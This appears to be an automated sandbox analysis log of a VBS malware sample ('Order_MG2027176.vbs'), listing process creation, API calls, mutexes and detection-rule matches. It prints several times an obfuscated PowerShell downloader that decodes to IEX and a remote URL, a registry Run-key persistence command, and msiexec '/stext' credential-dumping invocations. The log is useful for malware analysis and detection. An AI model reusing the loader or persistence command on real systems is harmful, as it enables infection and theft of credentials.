                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk caJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,18_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00401806 NtdllDefWindowProc_W,18_2_00401806
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004018C0 NtdllDefWindowProc_W,18_2_004018C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004016FD NtdllDefWindowProc_A,19_2_004016FD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004017B7 NtdllDefWindowProc_A,19_2_004017B7
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00402CAC NtdllDefWindowProc_A,20_2_00402CAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00402D66 NtdllDefWindowProc_A,20_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4AD3BEB24_2_00007FFB4AD3BEB2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4AD3B1064_2_00007FFB4AD3B106
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4AE0A42A4_2_00007FFB4AE0A42A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_041BEDF06_2_041BEDF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_041BF6C06_2_041BF6C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_041BEAA86_2_041BEAA8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0706CEF06_2_0706CEF0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232E719411_2_232E7194
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232DB5C111_2_232DB5C1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044B04018_2_0044B040
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0043610D18_2_0043610D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044731018_2_00447310
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044A49018_2_0044A490
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040755A18_2_0040755A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0043C56018_2_0043C560
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044B61018_2_0044B610
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044D6C018_2_0044D6C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004476F018_2_004476F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044B87018_2_0044B870
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044081D18_2_0044081D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0041495718_2_00414957
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004079EE18_2_004079EE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00407AEB18_2_00407AEB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044AA8018_2_0044AA80
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00412AA918_2_00412AA9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00404B7418_2_00404B74
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00404B0318_2_00404B03
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044BBD818_2_0044BBD8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00404BE518_2_00404BE5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00404C7618_2_00404C76
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00415CFE18_2_00415CFE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00416D7218_2_00416D72
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00446D3018_2_00446D30
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00446D8B18_2_00446D8B
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00406E8F18_2_00406E8F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0040503819_2_00405038
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0041208C19_2_0041208C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004050A919_2_004050A9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0040511A19_2_0040511A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0043C13A19_2_0043C13A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004051AB19_2_004051AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044930019_2_00449300
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0040D32219_2_0040D322
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044A4F019_2_0044A4F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0043A5AB19_2_0043A5AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0041363119_2_00413631
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044669019_2_00446690
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044A73019_2_0044A730
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004398D819_2_004398D8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004498E019_2_004498E0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044A88619_2_0044A886
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0043DA0919_2_0043DA09
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00438D5E19_2_00438D5E
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00449ED019_2_00449ED0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0041FE8319_2_0041FE83
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00430F5419_2_00430F54
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004050C220_2_004050C2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004014AB20_2_004014AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_0040513320_2_00405133
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004051A420_2_004051A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_0040124620_2_00401246
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_0040CA4620_2_0040CA46
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_0040523520_2_00405235
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004032C820_2_004032C8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_0040168920_2_00401689
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00402F6020_2_00402F60
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
                Source: Order_MG2027176.vbsInitial sample: Strings found which are bigger than 50
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)"
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5941
                Source: unknownProcess created: Commandline size = 5941
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5941Jump to behavior
                Source: amsi32_5308.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5976, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5308, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@24/13@6/3
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,18_2_004182CE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,20_2_00410DE1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,18_2_00418758
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,18_2_00413D4C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,18_2_004148B6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cobblerism.AceJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-N1P6UN
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bidlgidu.ijd.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_MG2027176.vbs"
                Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = &apos;Afklaret.exe&apos;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5976
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5308
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: msiexec.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: msiexec.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msiexec.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: msiexec.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: msiexec.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: msiexec.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_19-33236
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_MG2027176.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
                Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hywcyvebel"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hywcyvebel"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kscvygpustapv"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uuhnryzwobsuytie"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677eJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' 